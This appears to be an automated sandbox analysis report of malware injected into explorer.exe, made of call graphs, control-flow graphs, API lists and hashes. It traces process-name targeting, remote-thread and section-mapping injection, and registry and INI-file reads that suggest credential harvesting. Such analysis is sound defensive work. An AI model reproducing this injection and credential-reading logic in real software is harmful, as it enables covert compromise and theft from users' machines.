                                                                                                                              callgraph 0 Function_00C84048 1 Function_00C836C8 20 Function_00C818E8 1->20 25 Function_00C81860 1->25 30 Function_00C821E4 1->30 67 Function_00C81B14 1->67 2 Function_00C8234C 3 Function_00C81A4C 4 Function_00C81C40 5 Function_00C82340 6 Function_00C829C0 44 Function_00C82688 6->44 7 Function_00C82BC0 18 Function_00C82A54 7->18 7->25 7->44 52 Function_00C82700 7->52 63 Function_00C82610 7->63 74 Function_00C8272C 7->74 83 Function_00C81838 7->83 84 Function_00C81938 7->84 8 Function_00C89FC2 9 Function_00C83458 9->6 9->9 13 Function_00C83254 9->13 9->25 39 Function_00C82774 9->39 9->44 9->52 76 Function_00C828A0 9->76 9->83 10 Function_00C89ADA 11 Function_00C8A25A 12 Function_00C818D0 13->25 13->44 46 Function_00C8298C 13->46 69 Function_00C830A8 13->69 13->74 82 Function_00C82938 13->82 13->83 14 Function_00C82354 15 Function_00C81AD4 16 Function_00C814D4 17 Function_00C81254 18->25 18->83 19 Function_00C8A055 21 Function_00C822E8 22 Function_00C83668 22->9 23 Function_00C8156C 24 Function_00C82B6C 57 Function_00C82498 24->57 68 Function_00C82514 24->68 25->15 26 Function_00C81DE0 26->3 27 Function_00C81560 28 Function_00C82360 29 Function_00C8A1E0 58 Function_00C8A298 29->58 30->25 78 Function_00C81E20 30->78 30->83 31 Function_00C818F8 32 Function_00C82AF8 32->83 33 Function_00C82EF8 33->63 34 Function_00C814F9 35 Function_00C8A1F9 35->58 36 Function_00C82F7C 36->7 36->18 36->25 36->33 55 Function_00C82E04 36->55 37 Function_00C823F0 73 Function_00C823AC 37->73 38 Function_00C82570 38->14 77 Function_00C823A0 38->77 38->83 39->25 39->39 39->83 40 Function_00C837F4 40->1 40->14 40->21 40->24 40->38 43 Function_00C82308 40->43 71 Function_00C8372C 40->71 72 Function_00C822AC 40->72 88 Function_00C822B4 40->88 41 Function_00C81576 42 Function_00C81508 44->83 45 Function_00C83608 45->9 47 Function_00C81B8C 47->83 48 Function_00C8188C 48->83 49 Function_00C8B00C 50 Function_00C81980 51 Function_00C81000 52->25 52->44 53 Function_00C8B181 54 Function_00C84082 55->25 55->47 55->83 56 Function_00C81405 57->5 57->73 58->11 59 Function_00C8971C 60 Function_00C8141D 61 Function_00C81D10 61->31 61->83 62 Function_00C82410 62->37 62->73 63->83 64 Function_00C8B111 65 Function_00C89912 66 Function_00C89C92 67->83 68->2 68->14 68->28 68->37 68->77 69->25 69->32 69->36 69->44 69->52 69->69 69->74 70 Function_00C841A9 71->25 71->83 75 Function_00C8A1AF 75->58 76->25 76->39 76->83 78->4 78->12 78->25 78->26 78->31 78->48 78->50 78->61 78->83 79 Function_00C81822 80 Function_00C847A7 81 Function_00C899A7 85 Function_00C838B0 85->15 85->83 85->85 86 Function_00C89930 87 Function_00C814B2 89 Function_00C89EB4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 184 c830a8-c830e3 call c82688 call c8272c 189 c830ec-c83111 call c82688 FindFirstFileW 184->189 190 c830e5-c830e6 184->190 193 c83237-c83252 call c81860 * 2 189->193 194 c83117-c83118 189->194 190->189 195 c8311f-c83124 194->195 197 c8312a-c8313e 195->197 198 c831ad-c831df call c82688 call c82700 195->198 205 c83210-c83220 FindNextFileW 197->205 206 c83144-c83158 197->206 214 c83208-c8320b call c81860 198->214 215 c831e1-c831eb call c82af8 198->215 205->195 208 c83226-c83230 FindClose 205->208 206->205 211 c8315e-c8316b call c8272c 206->211 208->193 220 c8316d-c83174 211->220 221 c83176 211->221 214->205 215->214 223 c831ed-c83203 call c82f7c 215->223 222 c83178-c831a8 call c82688 call c82700 call c830a8 call c81860 220->222 221->222 222->198 223->214
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                              • Instruction ID: 05935552a3ff1a14137138a0a171885961879fb3d4e079bf22016127bf345762
                                                                                                                              • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                              • Instruction Fuzzy Hash: 46418E30318B4C4FDB94FB29C85D7AE73E2FBD8744F444A29A44AC3191EE789A049785

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 239 c838b0-c83907 call c81ad4 call c81838 NtUnmapViewOfSection call c8388c 248 c83909-c8390c call c838b0 239->248 249 c83911-c8391a 239->249 248->249
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 00C838F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                              • Instruction ID: e7b4b2e1541a4b3b6656855c802356f1b18e33de9afd4a155206f91717b856fb
                                                                                                                              • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                              • Instruction Fuzzy Hash: 51F0E520F11A481BEFAC77BD685D33822C4EB98319F50052AF925D32D2DC3D8E468305

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 00C827C7
                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 00C827F4
                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 00C8283A
                                                                                                                              • RegCloseKey.KERNELBASE ref: 00C82860
                                                                                                                                • Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1641618270-0
                                                                                                                              • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                              • Instruction ID: 93865ebf3214341639852e107a90062fd4af1e1ec085253854fe507745b3aa3d
                                                                                                                              • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                              • Instruction Fuzzy Hash: 9A31C83120CB488FEB58EF29D44C77A77D0FBA8359F04062EE49AC22A4DF24C9428746

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 22 c8372c-c837ba call c81838 RegCreateKeyExW 26 c837bc-c837cb RegCloseKey 22->26 27 c837d6-c837f0 call c81860 22->27 26->27 28 c837cd-c837d3 26->28 28->27
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreate
                                                                                                                              • String ID: ?
                                                                                                                              • API String ID: 2932200918-1684325040
                                                                                                                              • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                              • Instruction ID: ea0a0fe013410949537e1aadf2e33327bbca5da43bcdc54b5bcfa699e198478d
                                                                                                                              • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                              • Instruction Fuzzy Hash: 1B119070608B488FD751EF29D48866AB7E1FB98305F40062EF48AC3260DF38D985CB82

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 31 c8a298-c8a29b 32 c8a2a5-c8a2a9 31->32 33 c8a2ab-c8a2b3 32->33 34 c8a2b5 32->34 33->34 35 c8a29d-c8a2a3 34->35 36 c8a2b7 34->36 35->32 37 c8a2ba-c8a2c1 36->37 39 c8a2cd 37->39 40 c8a2c3-c8a2cb 37->40 39->37 41 c8a2cf-c8a2d2 39->41 40->39 42 c8a2d4-c8a2e2 41->42 43 c8a2e7-c8a2f4 41->43 44 c8a31e-c8a339 42->44 45 c8a2e4-c8a2e5 42->45 57 c8a30e-c8a31c call c8a25a 43->57 58 c8a2f6-c8a2f8 43->58 46 c8a36a-c8a36d 44->46 45->43 48 c8a36f-c8a370 46->48 49 c8a372-c8a379 46->49 50 c8a351-c8a355 48->50 51 c8a37f-c8a383 49->51 55 c8a33b-c8a33e 50->55 56 c8a357-c8a35a 50->56 53 c8a3e0-c8a3e9 51->53 54 c8a385-c8a39e LoadLibraryA 51->54 64 c8a3ec-c8a3f5 53->64 60 c8a39f-c8a3a6 54->60 55->49 61 c8a340 55->61 56->49 62 c8a35c-c8a360 56->62 57->32 63 c8a2fb-c8a302 58->63 60->51 66 c8a3a8 60->66 67 c8a341-c8a345 61->67 62->67 68 c8a362-c8a369 62->68 78 c8a30c 63->78 79 c8a304-c8a30a 63->79 69 c8a41a-c8a46a VirtualProtect * 2 64->69 70 c8a3f7-c8a3f9 64->70 74 c8a3aa-c8a3b2 66->74 75 c8a3b4-c8a3bc 66->75 67->50 76 c8a347-c8a349 67->76 68->46 73 c8a46e-c8a473 69->73 71 c8a3fb-c8a40a 70->71 72 c8a40c-c8a418 70->72 71->64 72->71 73->73 80 c8a475-c8a484 73->80 81 c8a3be-c8a3ca 74->81 75->81 76->50 82 c8a34b-c8a34f 76->82 78->57 78->63 79->78 85 c8a3cc-c8a3d3 81->85 86 c8a3d5-c8a3df 81->86 82->50 82->56 85->60
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNELBASE ref: 00C8A397
                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00C8A441
                                                                                                                              • VirtualProtect.KERNELBASE ref: 00C8A45F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C89000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C89000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c89000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 895956442-0
                                                                                                                              • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                              • Instruction ID: 98cd08000ba281231d058f246dd764af94d6388f7cd5b474216f00dc28c81328
                                                                                                                              • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                              • Instruction Fuzzy Hash: 0051673235891D4BEB24BB7C98C43F5B3C1F759329B18062BC4AAC3295E559D946838B

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 87 c83254-c83287 call c8298c 90 c8343a-c83456 87->90 91 c8328d-c83297 call c8298c 87->91 91->90 94 c8329d-c832aa call c8272c 91->94 97 c832ac-c832b3 94->97 98 c832b5 94->98 99 c832b7-c832c2 call c82688 97->99 98->99 102 c832c8-c832fe call c82688 call c81838 * 2 call c82938 99->102 103 c8342c-c83435 call c830a8 99->103 113 c8340c-c83427 call c81860 * 4 102->113 114 c83304-c83318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 116 c8331e-c83326 114->116 116->113 118 c8332c-c8332f 116->118 118->113 119 c83335-c83348 118->119 124 c8334e-c83377 GetPrivateProfileStringW 119->124 125 c833f0-c83406 119->125 124->125 127 c83379-c83398 GetPrivateProfileIntW 124->127 125->113 125->118 130 c8339a-c833ad call c82688 127->130 131 c833e5-c833eb call c830a8 127->131 135 c833af-c833b3 130->135 136 c833c6-c833e3 call c830a8 call c81860 130->136 131->125 137 c833bd-c833c4 135->137 138 c833b5-c833ba 135->138 136->125 137->135 137->136 138->137
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00C8298C: GetFileAttributesW.KERNELBASE ref: 00C8299E
                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00C8330F
                                                                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 00C8336F
                                                                                                                              • GetPrivateProfileIntW.KERNEL32 ref: 00C8338C
                                                                                                                                • Part of subcall function 00C830A8: FindFirstFileW.KERNELBASE ref: 00C83104
                                                                                                                                • Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 970345848-0
                                                                                                                              • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                              • Instruction ID: 7adebeabff05388cc167fe26a10099114287284710af07c0d84e3c6d53fecf2a
                                                                                                                              • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                              • Instruction Fuzzy Hash: FE51ED30718F494FDB59BB2D981A67D33D2EBD8704B44057DE40AC3296EE64DE42938E

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • StrStrIW.KERNELBASE ref: 00C8347E
                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 00C8353F
                                                                                                                              • RegEnumKeyExW.KERNELBASE ref: 00C835D6
                                                                                                                                • Part of subcall function 00C82774: RegOpenKeyExW.KERNELBASE ref: 00C827C7
                                                                                                                                • Part of subcall function 00C82774: RegQueryValueExW.KERNELBASE ref: 00C827F4
                                                                                                                                • Part of subcall function 00C82774: RegQueryValueExW.KERNELBASE ref: 00C8283A
                                                                                                                                • Part of subcall function 00C82774: RegCloseKey.KERNELBASE ref: 00C82860
                                                                                                                                • Part of subcall function 00C83254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00C8330F
                                                                                                                                • Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1841478724-0
                                                                                                                              • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                              • Instruction ID: 610aadcaf060cfbb709746bc3cdbd77630626d3d52774a674ddd72c35203efa7
                                                                                                                              • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                              • Instruction Fuzzy Hash: 48416930718B484FDB98FF6D889972AB6E2FBD8744F04056EA44EC32A1DE34DD058B46

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 232 c82938-c82943 233 c82984 232->233 234 c82945-c82948 232->234 236 c82986-c8298b 233->236 234->233 235 c8294a-c82970 CreateFileW 234->235 237 c82980-c82982 235->237 238 c82972-c8297a CloseHandle 235->238 237->236 238->237
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3498533004-0
                                                                                                                              • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                              • Instruction ID: 5ac6f6efb32412baa6a3f323687267149ec96977ab28e42bf2563896c7d9da3a
                                                                                                                              • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                              • Instruction Fuzzy Hash: 44F0657021571A4FE7547FB9449C336B5D0FB48359F18463DE46AC23D0D73589468746

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 251 c822b4-c822c6 252 c822c8-c822d0 CreateStreamOnHGlobal 251->252 253 c822d6-c822e6 251->253 252->253
                                                                                                                              APIs
                                                                                                                              • CreateStreamOnHGlobal.COMBASE ref: 00C822D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2244384528-0
                                                                                                                              • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                              • Instruction ID: 4225217ab70f82292582b09a09c14aa1c7f99a20a1510b023ae38c9d464991c6
                                                                                                                              • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                              • Instruction Fuzzy Hash: ABE08C30108B0A8FD758AFBCE4CA07933A1EB9C256B05053EE005CB114D27988C18741

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 254 c8298c-c82997 255 c82999-c8299c 254->255 256 c829b5 254->256 255->256 258 c8299e-c829a7 GetFileAttributesW 255->258 257 c829b7-c829bc 256->257 259 c829a9-c829af 258->259 260 c829b1-c829b3 258->260 259->260 260->257
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE ref: 00C8299E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                              • Instruction ID: 02b82b8282a68ba7312323f78c02a56c8e6c2b475f0a8d6345478d32406fb843
                                                                                                                              • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                              • Instruction Fuzzy Hash: 8FD0A732732915277B6436FA08DD27130A0D71932EF14033AEA36C11E0E285CED5A309

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 261 c81860-c81870 call c81ad4 264 c81872-c81880 RtlFreeHeap 261->264 265 c81886-c8188b 261->265 264->265
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_c81000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                              • Instruction ID: c95484c46c8330658312d3cb68c26ba8135e1b940de0757f73a52d1021f85e3a
                                                                                                                              • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                              • Instruction Fuzzy Hash: 9DD02220712A040BEF2CBBFA1C8E1747AD6E758216B0C8020BC28C3291DD39C886C305

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                              Signature Coverage:27.5%
                                                                                                                              Total number of Nodes:306
                                                                                                                              Total number of Limit Nodes:42
                                                                                                                              execution_graph 707 34a7728 708 34a7904 707->708 709 34a774b 707->709 708->708 710 34a785a LoadLibraryA 709->710 714 34a789f VirtualProtect VirtualProtect 709->714 711 34a7871 710->711 711->709 713 34a7883 GetProcAddress 711->713 713->711 715 34a7899 713->715 714->708 991 34a245e lstrlen 992 34a2476 CryptBinaryToStringA 991->992 993 34a24a5 991->993 992->993 994 34a2489 992->994 997 34a2861 GetProcessHeap RtlAllocateHeap 994->997 996 34a2494 CryptBinaryToStringA 996->993 997->996 716 34a1000 717 34a1010 716->717 718 34a1007 716->718 720 34a1016 718->720 769 34a2608 VirtualQuery 720->769 723 34a1097 723->717 725 34a102c RtlMoveMemory 726 34a104d 725->726 727 34a1071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 34a2861 GetProcessHeap RtlAllocateHeap 726->806 729 34a109e 727->729 730 34a1092 727->730 772 34a10a4 729->772 730->723 732 34a1095 730->732 731 34a1052 RtlMoveMemory 731->727 807 34a1332 732->807 734 34a10a3 736 34a2861 GetProcessHeap RtlAllocateHeap 734->736 737 34a10cc 736->737 738 34a10dc CreateToolhelp32Snapshot 737->738 739 34a1322 Sleep 738->739 740 34a10f0 Process32First 738->740 739->738 741 34a131b CloseHandle 740->741 742 34a110c lstrcmpiA 740->742 741->739 743 34a1280 742->743 744 34a1124 lstrcmpiA 742->744 746 34a25ad OpenProcess IsWow64Process IsWow64Process CloseHandle 743->746 749 34a1305 Process32Next 743->749 758 34a2608 VirtualQuery 743->758 760 34a12ae lstrcmpiA 743->760 765 34a1819 30 API calls 743->765 744->743 745 34a1138 lstrcmpiA 744->745 745->743 747 34a114c lstrcmpiA 745->747 746->743 747->743 748 34a1160 lstrcmpiA 747->748 748->743 750 34a1170 lstrcmpiA 748->750 749->742 751 34a1319 749->751 750->743 752 34a1184 lstrcmpiA 750->752 751->741 752->743 753 34a1198 lstrcmpiA 752->753 753->743 754 34a11ac lstrcmpiA 753->754 754->743 755 34a11c0 lstrcmpiA 754->755 755->743 756 34a11d4 lstrcmpiA 755->756 756->743 757 34a11e8 lstrcmpiA 756->757 757->743 759 34a11fc lstrcmpiA 757->759 758->743 759->743 761 34a120c lstrcmpiA 759->761 760->743 761->743 762 34a121c lstrcmpiA 761->762 762->743 763 34a122c lstrcmpiA 762->763 763->743 764 34a123c lstrcmpiA 763->764 764->743 766 34a124c lstrcmpiA 764->766 765->743 766->743 767 34a125c lstrcmpiA 766->767 767->743 768 34a126c lstrcmpiA 767->768 768->743 768->749 770 34a101e 769->770 770->723 771 34a2861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 34a2861 GetProcessHeap RtlAllocateHeap 772->834 774 34a10cc 775 34a10dc CreateToolhelp32Snapshot 774->775 776 34a1322 Sleep 775->776 777 34a10f0 Process32First 775->777 776->775 778 34a131b CloseHandle 777->778 779 34a110c lstrcmpiA 777->779 778->776 780 34a1280 779->780 781 34a1124 lstrcmpiA 779->781 786 34a1305 Process32Next 780->786 795 34a2608 VirtualQuery 780->795 797 34a12ae lstrcmpiA 780->797 835 34a25ad OpenProcess 780->835 841 34a1819 780->841 781->780 782 34a1138 lstrcmpiA 781->782 782->780 784 34a114c lstrcmpiA 782->784 784->780 785 34a1160 lstrcmpiA 784->785 785->780 787 34a1170 lstrcmpiA 785->787 786->779 788 34a1319 786->788 787->780 789 34a1184 lstrcmpiA 787->789 788->778 789->780 790 34a1198 lstrcmpiA 789->790 790->780 791 34a11ac lstrcmpiA 790->791 791->780 792 34a11c0 lstrcmpiA 791->792 792->780 793 34a11d4 lstrcmpiA 792->793 793->780 794 34a11e8 lstrcmpiA 793->794 794->780 796 34a11fc lstrcmpiA 794->796 795->780 796->780 798 34a120c lstrcmpiA 796->798 797->780 798->780 799 34a121c lstrcmpiA 798->799 799->780 800 34a122c lstrcmpiA 799->800 800->780 801 34a123c lstrcmpiA 800->801 801->780 803 34a124c lstrcmpiA 801->803 803->780 804 34a125c lstrcmpiA 803->804 804->780 805 34a126c lstrcmpiA 804->805 805->780 805->786 806->731 887 34a2861 GetProcessHeap RtlAllocateHeap 807->887 809 34a1340 GetModuleFileNameA 888 34a2861 GetProcessHeap RtlAllocateHeap 809->888 811 34a1357 GetCurrentProcessId wsprintfA 889 34a263e CryptAcquireContextA 811->889 814 34a139c Sleep 894 34a24d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 34a140d 912 34a2843 815->912 819 34a13ae GetModuleHandleA GetProcAddress 821 34a13da GetModuleHandleA GetProcAddress 819->821 822 34a13c9 819->822 820 34a2843 3 API calls 823 34a141b RtlExitUserThread 820->823 825 34a1406 821->825 826 34a13f5 821->826 902 34a1de3 822->902 827 34a1425 823->827 829 34a24d5 10 API calls 825->829 828 34a1de3 3 API calls 826->828 830 34a144b 827->830 831 34a2608 VirtualQuery 827->831 828->825 829->815 830->729 832 34a143a 831->832 832->830 917 34a1493 832->917 834->774 836 34a25cb IsWow64Process 835->836 837 34a2600 835->837 838 34a25dc IsWow64Process 836->838 839 34a25ee 836->839 837->780 838->839 840 34a25f9 CloseHandle 838->840 839->840 840->837 842 34a2608 VirtualQuery 841->842 843 34a1833 842->843 844 34a1845 OpenProcess 843->844 845 34a1a76 843->845 844->845 846 34a185e 844->846 845->780 847 34a2608 VirtualQuery 846->847 848 34a1865 847->848 848->845 849 34a188f 848->849 850 34a1873 NtSetInformationProcess 848->850 872 34a1a80 849->872 850->849 853 34a1a80 2 API calls 854 34a18d6 853->854 855 34a1a73 CloseHandle 854->855 856 34a1a80 2 API calls 854->856 855->845 857 34a1900 856->857 878 34a1b17 857->878 860 34a1a80 2 API calls 861 34a1930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 34a1a4e CreateRemoteThread 861->862 863 34a1985 861->863 864 34a1a65 CloseHandle 862->864 865 34a198b CreateMutexA GetLastError 863->865 868 34a19bb GetModuleHandleA GetProcAddress ReadProcessMemory 863->868 866 34a1a67 CloseHandle CloseHandle 864->866 865->863 867 34a19a7 CloseHandle Sleep 865->867 866->855 867->865 869 34a19ec WriteProcessMemory 868->869 870 34a1a47 868->870 869->870 871 34a1a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->866 871->870 873 34a18b4 872->873 874 34a1a94 872->874 873->853 875 34a1aa4 NtCreateSection 874->875 876 34a1ac3 874->876 875->876 876->873 877 34a1ad8 NtMapViewOfSection 876->877 877->873 879 34a1b2e 878->879 885 34a1b60 878->885 880 34a1b30 RtlMoveMemory 879->880 880->880 880->885 881 34a1bc3 882 34a1910 NtUnmapViewOfSection 881->882 884 34a1be1 LdrProcessRelocationBlock 881->884 882->860 883 34a1b71 LoadLibraryA 883->882 883->885 884->881 884->882 885->881 885->883 886 34a1ba1 GetProcAddress 885->886 886->882 886->885 887->809 888->811 890 34a1384 CreateMutexA GetLastError 889->890 891 34a2664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 34a26aa wsprintfA 891->892 892->892 893 34a26cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 34a2515 894->895 896 34a2565 CloseHandle 895->896 897 34a2555 Thread32Next 895->897 898 34a2521 OpenThread 895->898 896->819 897->895 899 34a253c SuspendThread 898->899 900 34a2544 ResumeThread 898->900 901 34a254a CloseHandle 899->901 900->901 901->897 903 34a1e56 902->903 904 34a1ded 902->904 903->821 904->903 944 34a1e93 VirtualProtect 904->944 906 34a1e04 906->903 945 34a2815 VirtualAlloc 906->945 908 34a1e10 909 34a1e1a RtlMoveMemory 908->909 910 34a1e2d 908->910 909->910 946 34a1e93 VirtualProtect 910->946 913 34a2608 VirtualQuery 912->913 914 